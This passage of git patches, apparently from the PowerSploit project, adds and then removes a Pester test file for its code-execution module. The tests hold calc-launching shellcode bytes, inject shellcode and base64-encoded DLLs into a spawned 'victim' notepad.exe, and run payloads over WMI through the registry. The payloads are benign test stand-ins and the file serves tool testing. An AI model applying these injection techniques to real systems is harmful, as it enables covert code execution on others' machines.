AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAABEAQAACjATMB0wIjAnMDAwNzBXMGQwmzCoMLMw7zD/MB4xKjEwMUIxTDFVMV8xZTFuMXQxeTF+MYMxizGQMaIxqjGwMbwxxzHQMdox4THnMewx8TH2MfsxATIJMh0yNzJXMmkycTJ2MnsynTKjMqoyrzK8Mssy0zLbMu8y9TL6MgIzCDMOMxszITMrM0ozUDNaM2AzaTNuM8sz2jPgM0Y0SzRdNHs0jzSVNEA1WzVnNXY1fzWMNbs1wzXPNeA16zXwNfU1DDYbNiE2NDZJNlQ2ajaENo42yjbPNuo27zYwNzY3QTdeN6k3rje+N8Q3yjfQN9Y33DfiN+g3+DcBOAg4GzhTOFk4XzhlOGs4cTh4OH84hjiNOJQ4mziiOKo4sji6OMY4zzjUONo45DjuOP44DjkeOSc5Njk8OUI5SDkAAAAgAAAgAAAAsDC8MMAwxDDQMNQwVDGEMYgxpDGoMcgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
+
+	$WideStrDllBytes32 = [Convert]::FromBase64String($Encoded32BitWStringDll)
+	$StrDllBytes32 = [Convert]::FromBase64String($Encoded32BitStringDll)
+	$VoidDllBytes32 = [Convert]::FromBase64String($Encoded32BitVoidDll)
+	$WideStrDllBytes64 = [Convert]::FromBase64String($Encoded64BitWStringDll)
+	$StrDllBytes64 = [Convert]::FromBase64String($Encoded64BitStringDll)
+	$VoidDllBytes64 = [Convert]::FromBase64String($Encoded64BitVoidDll)
+	$ExeBytes32 = [Convert]::FromBase64String($Encoded32BitExe)
+	$ExeBytes64 = [Convert]::FromBase64String($Encoded64BitExe)
+
+	if ([IntPtr]::Size -eq 4) {
+		$PowerShell32bit = $True
+		$WideStrDllBytes = $WideStrDllBytes32
+		$StrDllBytes = $StrDllBytes32
+		$VoidDllBytes = $VoidDllBytes32
+		$ExeBytes = $ExeBytes32
+	} else {
+		$PowerShell32bit = $False
+		$WideStrDllBytes = $WideStrDllBytes64
+		$StrDllBytes = $StrDllBytes64
+		$VoidDllBytes = $VoidDllBytes64
+		$ExeBytes = $ExeBytes64
+	}
+
+	Context 'DLL loading' {
+		It 'should load a DLL (wchar_t*) in memory within powershell.exe and returns "Hello, world!"' {
+			$Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType WString -DoNotZeroMZ
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should load a DLL (char*) in memory within powershell.exe and returns "Hello, world!"' {
+			$Result = Invoke-ReflectivePEInjection -PEBytes $StrDllBytes -FuncReturnType String -DoNotZeroMZ
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should load a DLL (void) in memory within powershell.exe and writes "Hello, world!" to %TEMP%\testoutput.txt' {
+			$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
+			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
+
+			Invoke-ReflectivePEInjection -PEBytes $VoidDllBytes -FuncReturnType Void -DoNotZeroMZ
+
+			Start-Sleep -Seconds 2
+			$TestOutputPath | Should Exist
+			$Result = Get-Content $TestOutputPath
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should load a DLL (void) in memory within notepad.exe and write "Hello, world!" to %TEMP%\testoutput.txt' {
+			$64BitOS = $False
+			if ($Env:ProgramW6432) { $64BitOS = $True }
+
+			# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe
+			if ($PowerShell32bit -and $64BitOS) {
+				# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad
+				$NotepadPath = "$($Env:SystemRoot)\SysWow64\notepad.exe"
+			} else {
+				$NotepadPath = "$($Env:SystemRoot)\System32\notepad.exe"
+			}
+
+			$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
+
+			if ($NotepadProc.ReturnValue -ne 0) {
+				throw 'Could not start victim process: notepad.exe'
+			} 
+
+			$VictimPID = $NotepadProc.ProcessId
+
+			$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
+			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
+
+			Invoke-ReflectivePEInjection -PEBytes $VoidDllBytes -ProcId $VictimPID -DoNotZeroMZ
+
+			$Result = Get-Content $TestOutputPath
+
+			Start-Sleep -Seconds 2
+
+			Stop-Process -Id $VictimPID
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should not load a DLL in memory within powershell.exe when the bitness of powershell.exe and the DLL do not match.' {
+			if ($PowerShell32bit) {
+				$PEBytes = $WideStrDllBytes64
+			} else {
+				$PEBytes = $WideStrDllBytes32
+			}
+
+			# Attempt to load the wide string DLL in memory with a mismatched bitness
+			{ Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -DoNotZeroMZ } | Should Throw
+		}
+
+		It 'should not load a DLL in memory within powershell.exe when the return types do not match.' {
+			# This DLL exports WStringFunc which means that -FunReturnType should be WString
+			{ $Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType String -DoNotZeroMZ } | Should Throw
+		}
+	}
+
+	Context 'EXE Loading' {
+		$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
+
+		BeforeEach {
+			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
+		}
+
+		It 'should load an EXE in memory within powershell.exe and write "Hello, world!" to %TEMP%\testoutput.txt when provided no arguments' {
+			Invoke-ReflectivePEInjection -PEBytes $ExeBytes -DoNotZeroMZ
+		}
+
+		It 'should load an EXE in memory within powershell.exe and write "Hello, world!" to %TEMP%\testoutput.txt when provided arguments' {
+			Invoke-ReflectivePEInjection -PEBytes $ExeBytes -ExeArgs 'foo bar' -DoNotZeroMZ
+		}
+
+		AfterEach {
+			Start-Sleep -Seconds 2
+			$TestOutputPath | Should Exist
+			$Result = Get-Content $TestOutputPath
+
+			$Result | Should Not BeNullOrEmpty
+			$Result.StartsWith('Hello, world!') | Should Be $True
+		}
+	}
+}
\ No newline at end of file
-- 
cgit v1.2.3


From a78b40429e745a9f32a0d4a50836d5db07a62873 Mon Sep 17 00:00:00 2001
From: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date: Mon, 9 Nov 2015 10:52:41 -0800
Subject: Revert "Excluding the Tests folder from being loaded as a module"

This reverts commit a0ab599810f8f05a9bf24850fb9104516b71abb7.
---
 PowerSploit.psm1              |   2 +-
 PowerSploit.pssproj           |   1 +
 Tests/CodeExecution.tests.ps1 | 362 ------------------------------------------
 3 files changed, 2 insertions(+), 363 deletions(-)
 delete mode 100644 Tests/CodeExecution.tests.ps1

(limited to 'Tests')

diff --git a/PowerSploit.psm1 b/PowerSploit.psm1
index 9bc0240..550b8be 100644
--- a/PowerSploit.psm1
+++ b/PowerSploit.psm1
@@ -1 +1 @@
-Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and ($_.Name -ne 'Tests') } | % { Import-Module $_.FullName -DisableNameChecking }
+Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName -DisableNameChecking }
diff --git a/PowerSploit.pssproj b/PowerSploit.pssproj
index ea5854c..bd96099 100644
--- a/PowerSploit.pssproj
+++ b/PowerSploit.pssproj
@@ -78,6 +78,7 @@
     <Compile Include="CodeExecution\Invoke-ReflectivePEInjection_Resources\Shellcode\x86\ExitThread.asm" />
     <Compile Include="CodeExecution\Invoke-ReflectivePEInjection_Resources\Shellcode\x86\GetProcAddress.asm" />
     <Compile Include="CodeExecution\Invoke-Shellcode.ps1" />
+    <Compile Include="CodeExecution\Invoke-ShellcodeMSIL.ps1" />
     <Compile Include="CodeExecution\Invoke-WmiCommand.ps1" />
     <Compile Include="CodeExecution\Usage.md" />
     <Compile Include="Exfiltration\Exfiltration.psd1" />
diff --git a/Tests/CodeExecution.tests.ps1 b/Tests/CodeExecution.tests.ps1
deleted file mode 100644
index b8e415e..0000000
--- a/Tests/CodeExecution.tests.ps1
+++ /dev/null
@@ -1,362 +0,0 @@
-Set-StrictMode -Version Latest
-
-$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
-$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
-$ModuleManifest = "$ModuleRoot\CodeExecution\CodeExecution.psd1"
-
-Remove-Module [C]odeExecution
-Import-Module $ModuleManifest -Force -ErrorAction Stop
-
-Describe 'Invoke-Shellcode' {
-	# 32-bit calc popping shellcode
-	[Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
-								0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
-								0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
-								0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
-								0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
-								0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
-								0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
-								0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
-								0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
-								0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
-								0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
-								0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
-								0x61,0x6c,0x63,0x00)
-
-	# 64-bit calc popping shellcode
-	[Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
-								0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
-								0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
-								0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
-								0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
-								0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
-								0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
-								0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
-								0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
-								0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
-								0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
-								0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
-								0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
-								0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
-								0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
-								0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
-								0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)
-
-	$PowerShell32bit = $False
-	$Shellcode = $Shellcode64
-
-	if ([IntPtr]::Size -eq 4) {
-		$PowerShell32bit = $True
-		$Shellcode = $Shellcode32
-	}
-
-	$64BitOS = $False
-	if ($Env:ProgramW6432) { $64BitOS = $True }
-
-	# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe
-	if ($PowerShell32bit -and $64BitOS) {
-		# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad
-		$NotepadPath = "$($Env:SystemRoot)\SysWow64\notepad.exe"
-	} else {
-		$NotepadPath = "$($Env:SystemRoot)\System32\notepad.exe"
-	}
-
-	BeforeEach {
-		# Kill all running instances of calc.exe or Calculator.exe (i.e. "modern" calc)
-		Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' } | Stop-Process -Force
-	}
-
-	It 'should pop calc without arguments' {
-		Invoke-Shellcode -Force
-
-		Start-Sleep -Seconds 2
-	}
-
-	It 'should pop calc in host process with -Shellcode arg' {
-		Invoke-Shellcode -Shellcode $Shellcode -Force
-
-		Start-Sleep -Seconds 2
-	}
-
-	It 'should pop calc in victim notepad.exe process without -Shellcode arg' {
-		$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
-
-		if ($NotepadProc.ReturnValue -ne 0) {
-			throw 'Could not start victim process: notepad.exe'
-		} 
-
-		$VictimPID = $NotepadProc.ProcessId
-
-		Invoke-Shellcode -ProcessId $VictimPID -Force
-
-		Start-Sleep -Seconds 2
-
-		Stop-Process -Id $VictimPID
-	}
-
-	It 'should pop calc in victim notepad.exe process with -Shellcode arg' {
-		$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
-
-		if ($NotepadProc.ReturnValue -ne 0) {
-			throw 'Could not start victim process: notepad.exe'
-		}
-
-		$VictimPID = $NotepadProc.ProcessId
-
-		Invoke-Shellcode -ProcessId $VictimPID -Shellcode $Shellcode -Force
-
-		Start-Sleep -Seconds 2
-
-		Stop-Process -Id $VictimPID
-	}
-
-	AfterEach {
-		# Validate that a calc process was launched by the shellcode
-
-		$CalcProcs = Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' }
-		$CalcCount = $CalcProcs | Measure-Object
-
-		if ($CalcCount.Count -gt 0) {
-			$CalcProcs | Stop-Process -Force
-		}
-
-		$CalcCount.Count | Should BeGreaterThan 0
-	}
-}
-
-Describe 'Invoke-DllInjection' {
-	$Accessibilitycpl = 'accessibilitycpl.dll'
-	$AccessibilitycplPath = "$($Env:SystemRoot)\System32\$Accessibilitycpl"
-
-	It 'should inject a known system DLL' {
-		if (-not (Test-Path $AccessibilitycplPath)) {
-			throw "$AccessibilitycplPath does not exist on disk."
-		}
-		
-		$LoadedModule = Invoke-DllInjection -ProcessID $PID -Dll $AccessibilitycplPath
-		$LoadedModule | Should Not BeNullOrEmpty
-
-		$LoadedModule -is [System.Diagnostics.ProcessModule] | Should Be $True
-		$LoadedModule.ModuleName | Should Be $Accessibilitycpl
-	}
-
-	It 'should not inject a non-existent DLL' {
-		$NonExistentDllPath = 'C:\foo.dll'
-
-		Test-Path $NonExistentDllPath | Should Be $False
-
-		{ Invoke-DllInjection -ProcessID $PID -Dll $NonExistentDllPath } | Should Throw
-	}
-
-	It 'should not inject to a non-existent process' {
-		{ Invoke-DllInjection -ProcessID 0 -Dll $AccessibilitycplPath } | Should Throw
-	}
-}
-
-Describe 'Invoke-WmiCommand' {
-	$RegistryHive = 'HKEY_CURRENT_USER'
-	$KeyPath = 'SOFTWARE\Microsoft\Cryptography\RNG'
-	$RegistryKeyPath = "HKCU:\$KeyPath"
-	$RegistryPayloadValueName = 'Seed'
-	$RegistryResultValueName = 'Value'
-	$ComputerName = 'localhost'
-	$SamplePayload = { 1+1 }
-	$SamplePayloadResult = & $SamplePayload
-	$SamplePayloadResultType = $SamplePayloadResult.GetType()
-
-	Context 'Successful code execution' {
-		BeforeEach {
-			# Ensure registry keys and values are cleaned up prior to execution
-			Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction SilentlyContinue
-			Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction SilentlyContinue
-			Remove-Item -Path $RegistryKeyPath -ErrorAction SilentlyContinue
-		}
-
-		AfterEach {
-			{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction Stop } | Should Throw
-			{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction Stop } | Should Throw
-			{ Remove-Item -Path $RegistryKeyPath -ErrorAction Stop } | Should Throw
-		}
-
-		It 'should execute a sample payload locally and clean up properly' {
-			$Result = Invoke-WmiCommand -Payload $SamplePayload
-
-			$Result | Should Not BeNullOrEmpty
-			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
-			$Result.PayloadOutput | Should Be $SamplePayloadResult
-			$Result.PSComputerName | Should Be $ComputerName
-		}
-
-		It 'should execute a sample payload "remotely" (localhost) and clean up properly' {
-			$Result = Invoke-WmiCommand -Payload $SamplePayload -ComputerName $ComputerName
-
-			$Result | Should Not BeNullOrEmpty
-			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
-			$Result.PayloadOutput | Should Be $SamplePayloadResult
-			$Result.PSComputerName | Should Be $ComputerName
-		}
-
-		It 'should execute a sample payload with explicit arguments locally and clean up properly' {
-			$Result = Invoke-WmiCommand -Payload $SamplePayload -RegistryHive $RegistryHive -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName
-		
-			$Result | Should Not BeNullOrEmpty
-			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
-			$Result.PayloadOutput | Should Be $SamplePayloadResult
-			$Result.PSComputerName | Should Be $ComputerName
-		}
-	}
-
-	Context 'Invalid arguments' {
-		It 'should not process invalid registry hives' {
-			{ Invoke-WmiCommand -Payload $SamplePayload -RegistryHive 'HKEY_FOO' -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName } | Should Throw
-		}
-	}
-}
-
-Describe 'Invoke-ReflectivePEInjection' {
-	# A bare bones test harness DLL that simply returns L"Hello, world!" upon having WStringFunc called
-	# See https://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
-	$Encoded64BitWStringDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACpa+De7QqOje0Kjo3tCo6Nz3NqjewKjo3Pc1KN7AqOjc9zUI3sCo6NUmljaO0Kjo0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAAZIYDALHxPFYAAAAAAAAAAPAAIiALAgwAAAIAAAAEAAAAAAAAABAAAAAQAAAAAACAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAABAAAAABAAAnqIAAAEAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAMCAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAABgAAAAAEAAAAAIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACQAAAAACAAAAACAAAABgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAAAwAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgBAAAAw8zMzMzMzMzMzMxIjQXpDwAAwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASABlAGwAbABvACwAIAB3AG8AcgBsAGQAIQAAAAAAAAAAIACAAQAAAAAAAAAAAAAAAAAAALHxPFYAAAAAYiAAAAEAAAABAAAAAQAAAFggAABcIAAAYCAAABAQAACEIAAAAABSZWZsZWN0aXZlUEVJbmplY3RUZXN0SGFybmVzcy5kbGwAV1N0cmluZ0Z1bmMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAACCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitWStringDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACpa+De7QqOje0Kjo3tCo6Nz3NqjewKjo3Pc1KN7AqOjc9zUI3sCo6NUmljaO0Kjo0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAO/wPFYAAAAAAAAAAOAAAiELAQwAAAIAAAAEAAAAAAAAABAAAAAQAAAAIAAAAAAAEAAQAAAAAgAABQABAAAAAAAFAAEAAAAAAABAAAAABAAANegAAAEAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAAAgIAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAFgAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAIAAAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAYAAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgBAAAAwgwAzMzMzMzMzMy4ACAAEMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA